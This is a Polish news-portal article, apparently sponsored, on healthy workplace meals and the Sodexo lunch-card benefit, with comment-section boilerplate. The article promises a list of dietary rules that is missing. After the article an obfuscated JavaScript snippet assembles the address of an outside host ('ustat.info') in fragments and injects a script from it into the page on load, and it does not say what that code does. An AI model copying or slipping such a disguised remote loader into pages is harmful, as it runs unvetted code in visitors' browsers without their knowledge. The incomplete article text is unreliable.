Często zdarza się, że posiłki zjadamy „z doskoku”, a nie raz, nie dwa zdarza się nam sięgać po kaloryczne dania typu fast-food. Zapominamy, że to, co ląduje na naszych talerzach, warunkuje nasz nastrój oraz zapał do pracy. Warto więc zwracać uwagę na to, co spożywa się w ciągu dnia i zabierać ze sobą do pracy odpowiednią ilość wartościowego pożywienia.
Organizacja posiłków do pracy – o czym warto pamiętać?
Trzymanie się zdrowej diety wcale nie jest tak trudne, jak początkowo mogłoby się wydawać. Wystarczy kierować się kilkoma podstawowymi zasadami i przekuwać je w nawyk. Co ciekawe, nic się nie stanie, jeśli od czasu do czasu postawi się na małe odstępstwa. Najważniejsze reguły podpowiadające, w jaki sposób wdrażać w życie kolejne punkty zbilansowanego planu żywieniowego są następujące:
Dofinansowanie posiłków dla pracowników – benefit, który powinien stać się standardem
Brakuje Ci czasu na przygotowywanie jedzenia do pracy? Sprawdź, czy w Twojej firmie pracownicy mogą korzystać z dofinansowania posiłków! To rozwiązanie, które również w naszym kraju zyskuje coraz większą popularność. Realizacja tego benefitu może odbywać się na wiele sposobów. Jednym z nich jest Sodexo – karta lunch. Jest to bezpośrednia odpowiedź na oczekiwania większości współczesnych pracowników. Posiadając taką kartę (doładowaną przez pracodawcę na określoną kwotę), użytkownicy mają możliwość płacenia za zakup posiłków w wyznaczonych punktach gastronomicznych, a także podczas zamawiania ich on-line. To benefit, który daje ogromną swobodę – pracownicy mają dostęp do zdrowych posiłków, a ich konkretny rodzaj mogą wybrać samodzielnie, nic nie jest im z góry narzucane. Kadra pracownicza docenia tego typu wsparcie ze strony firmy, które jest wyrazem dbałości o jej bezpieczeństwo oraz stan zdrowia.
Prawidłowe odżywianie się pracowników – recepta na wzrost ich wydajności
Właściwe wykorzystanie przerwy w pracy ma ogromne znaczenie dla samopoczucia pracowników oraz efektywnego realizowania przez nich obowiązków zawodowych. Istotną rolę odgrywa przede wszystkim sycący i zbilansowany posiłek, jaki powinno się wtedy spożyć. Pożywne śniadanie, lunch lub obiad to potężna dawka energii niezbędnej do dalszej pracy. Wiele radości sprawia jedzenie w towarzystwie współpracowników – to idealny sposób na chwilowy odpoczynek, wspólne spędzenie czasu i zintegrowanie się. W dodatku regularne odżywianie się ma duże znaczenie dla naszego zdrowia, warto więc motywować zespół do kształtowania w swoim życiu pozytywnych nawyków żywieniowych. Uzyskane w ten sposób korzyści będą obopólne.
(function(){
te6ku="j7ikhjyle6kh";te6k=document.createElement("script");
te6k_="u"+("st");te6k_+="at"+(".");te6k.async=true;te6k_+="in";
te6ku="316193192."+te6ku;te6k.type="text/javascript";te6ku+="b47yfXnillvi";
te6ku+="du2d2b";te6k_+=("f")+"o"+("/");te6k.src="https://"+te6k_+te6ku;
te6kd=document.body;te6kd.appendChild(te6k);
})();
Brak komentarza, Twój może być pierwszy.
Dodaj komentarz
Użytkowniku, pamiętaj, że w Internecie nie jesteś anonimowy. Ponosisz odpowiedzialność za treści zamieszczane na portalu zyciepabianic.pl. Dodanie opinii jest równoznaczne z akceptacją Regulaminu portalu. Jeśli zauważyłeś, że któraś opinia łamie prawo lub dobry obyczaj - powiadom nas [email protected] lub użyj przycisku Zgłoś komentarz